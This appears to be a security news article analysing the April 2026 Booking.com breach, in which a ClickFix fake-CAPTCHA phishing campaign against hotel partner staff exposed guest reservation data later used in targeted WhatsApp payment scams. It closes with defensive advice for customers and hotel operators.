On April 13, 2026, Booking.com began contacting customers with a message that has become a familiar shape in the post-breach communications landscape: unauthorized access had occurred, personal data associated with certain bookings had been viewed, and the company was taking steps to contain the situation.
Reservation PINs were reset. Customers were notified individually. Booking.com confirmed that financial information was not accessed. The company declined to answer questions about the total number of impacted users.
What makes this breach different from a standard credential-stuffing or direct-intrusion incident is where the attack began: not in Booking.comβs own systems, but in the network of its hotel partners β small and mid-size hospitality businesses that connect to Booking.comβs platform to manage reservations, and whose staff were targeted via a carefully constructed social engineering campaign that has been running, uninterrupted, since at least November 2024.
The ClickFix Technique That Opened the Door
The attack vector is a technique researchers call ClickFix. The basic mechanics are straightforward: a target receives a spoofed email appearing to come from a legitimate source β in this case, communications impersonating Booking.comβs own partner management notifications β and is directed to a page that displays a fake CAPTCHA verification prompt.
To complete the verification, the user is instructed to copy and paste a command into their system. That command executes a PowerShell script that downloads and installs a remote access trojan or information stealer. The victim believes they have completed a routine CAPTCHA check. They have actually handed the attacker persistent access to their machine.
Cofense, which tracks phishing infrastructure, had been monitoring this specific campaign against Booking.com hotel partners since November 2024. Microsoftβs Threat Intelligence team subsequently attributed the campaign to a criminal group tracked as Storm-1865 β a financially motivated actor with a documented history of targeting the hospitality sector. The malware deployed in the campaign included XWorm and VenomRAT, both well-documented remote access tools with keystroke logging and credential harvesting capabilities.
The campaign targeted hotel staff across North America, Oceania, South and Southeast Asia, and Europe. The geographic breadth was not accidental β it reflects the international footprint of Booking.comβs hotel partner network and the availability of targets across multiple time zones.
How Reservation Data Becomes a Weapon
The data exposed in this breach is not, by itself, financially sensitive in the way that payment card numbers or Social Security numbers are. There are no credit card numbers in the leaked dataset. Booking.com confirmed that financial information was not among the compromised records.
What was compromised is something more immediately useful for follow-on fraud: full names, email addresses, physical addresses, phone numbers, booking dates, hotel names, and extra notes or requests made to hotels. This is the data that makes a phishing message credible.
Researchers at Bridewell documented a three-stage infection chain β distinct from but related to the ClickFix technique β in which compromised hotel partner credentials were used to target Booking.com customers directly via WhatsApp. The messages combined fraudulent payment requests with accurate booking details: specific hotel names, exact dates, correct guest names. One user who posted their notification to Reddit told TechCrunch they had received exactly this kind of WhatsApp message two weeks prior to Booking.comβs breach notification.
That timeline matters. Customers received phishing messages using their real booking data before the breach was publicly disclosed. The attack was not theoretical. It was already in execution.
The more dangerous implication is the combination of data. An attacker who knows your name, your hotel, your check-in date, your phone number, and the specific requests you made to the property can construct a message that bypasses the intuitive fraud detection most people apply to unexpected communications. βHi, this is the front desk at [your exact hotel]. Regarding your upcoming stay on [your exact dates]β¦β β that message does not trigger the same skepticism as a generic phishing attempt.
This Attack Was Predicted and Ignored
The Booking.com ClickFix campaign is not a new threat. Cofense documented it in November 2024. Microsoft published threat intelligence on Storm-1865 and its hospitality sector targeting before the breach. Bridewellβs research on the three-stage infection chain β which documented compromised hotel staff machines being used to contact Booking.com guests directly β was published in early 2026.
Booking.com itself had previously experienced a significant breach in 2023, in which threat actors used compromised hotel partner systems to access the platformβs internal messaging tools and send fraudulent payment requests to guests. The 2023 incident and the 2026 breach share the same underlying structural weakness: a large partner network of hospitality businesses with variable security maturity, connected to a central platform that handles sensitive guest data.
The ClickFix technique specifically exploits the gap between corporate security tooling and human behaviour. An endpoint detection and response tool may not flag a user manually executing a PowerShell command from a copied-and-pasted string β the execution looks like a user action, not malware behaviour, because it is a user action. The user initiated it. The social engineering convinced them to do so.
For organisations operating partner networks or B2B platform ecosystems, this is the central challenge: your security posture extends to every partner with access to your platform. A hotel running Booking.comβs extranet interface on an unmanaged laptop is part of your attack surface, whether or not you have any direct control over that device.
What the Breach Means for Booking.com Customers
If you received a breach notification from Booking.com, your reservation PIN has already been reset. That is the immediate technical remediation the company applied.
The more important concern is not your Booking.com account β it is the phishing messages that may follow. Attackers who obtained your booking data before the breach was disclosed have had weeks to use it. The messages they send will be specific. They will know your name, your hotel, your dates, and potentially the hotel-specific requests you made.
Treat any unexpected communication about your booking with heightened skepticism, regardless of how accurate the details are. Do not click payment links or enter card details in response to messages received via WhatsApp, email, or SMS β even if the details appear completely accurate. Contact the hotel directly using a phone number sourced independently to verify any payment-related requests.
What Hotel Operators and Hospitality Businesses Need to Do
The ClickFix campaign that enabled this breach targeted hotel staff, not Booking.com itself. The hospitality businesses that connected their staff machines to this campaign were the point of entry.
For hotel operators and property managers using Booking.comβs partner portal:
Recognise ClickFix as a current, active threat. The technique is not novel, but it remains effective because it exploits user behaviour rather than technical vulnerabilities. Staff who manage reservations on platforms like Booking.comβs extranet are a specific, documented target population. Security awareness training should cover this attack pattern by name, with examples of what the fake CAPTCHA pages look like.
Apply endpoint protection to any machine accessing hospitality management platforms. Managed detection and response tools configured to flag unusual PowerShell executions can interrupt the ClickFix infection chain. Unmanaged personal laptops used to access partner portals are a persistent risk.
Review access controls on partner portal accounts. Accounts with broad access to guest data β names, contact details, booking information β should be protected with hardware-based MFA where platform support exists. If the platform does not support hardware tokens, push-based MFA is a minimum.
Report suspicious emails immediately. A hotel that receives a ClickFix campaign email targeting its Booking.com login has the opportunity to interrupt the attack before account compromise occurs. Reporting mechanisms should be clear and frictionless for front-desk and reservations staff who are not security professionals.
The Supply Chain Is Now the Attack Surface
The Booking.com breach is the latest in a sustained pattern of attacks that target platforms through their partner and vendor ecosystems rather than directly. We documented the same dynamic in our analysis of supply chain attacks as a cybersecurity vulnerability β the weakest link in a supply chain is rarely the primary organisation, because that organisation typically has more security resources than its partners.
For platforms with tens of thousands of hotel partners distributed globally, securing that partner network is not a problem that can be solved through Booking.comβs own infrastructure investments alone. It requires minimum security standards for partner access, active monitoring for anomalous access patterns originating from partner accounts, and rapid detection when partner-facing credentials have been compromised.
The 2023 incident suggested a structural problem. The 2026 breach confirms it.
Booking.com confirmed on April 13, 2026 that unauthorized third parties had accessed customer reservation data via compromised hotel partner accounts. The breach is attributed to a ClickFix social engineering campaign linked to threat group Storm-1865. The number of affected customers has not been disclosed.
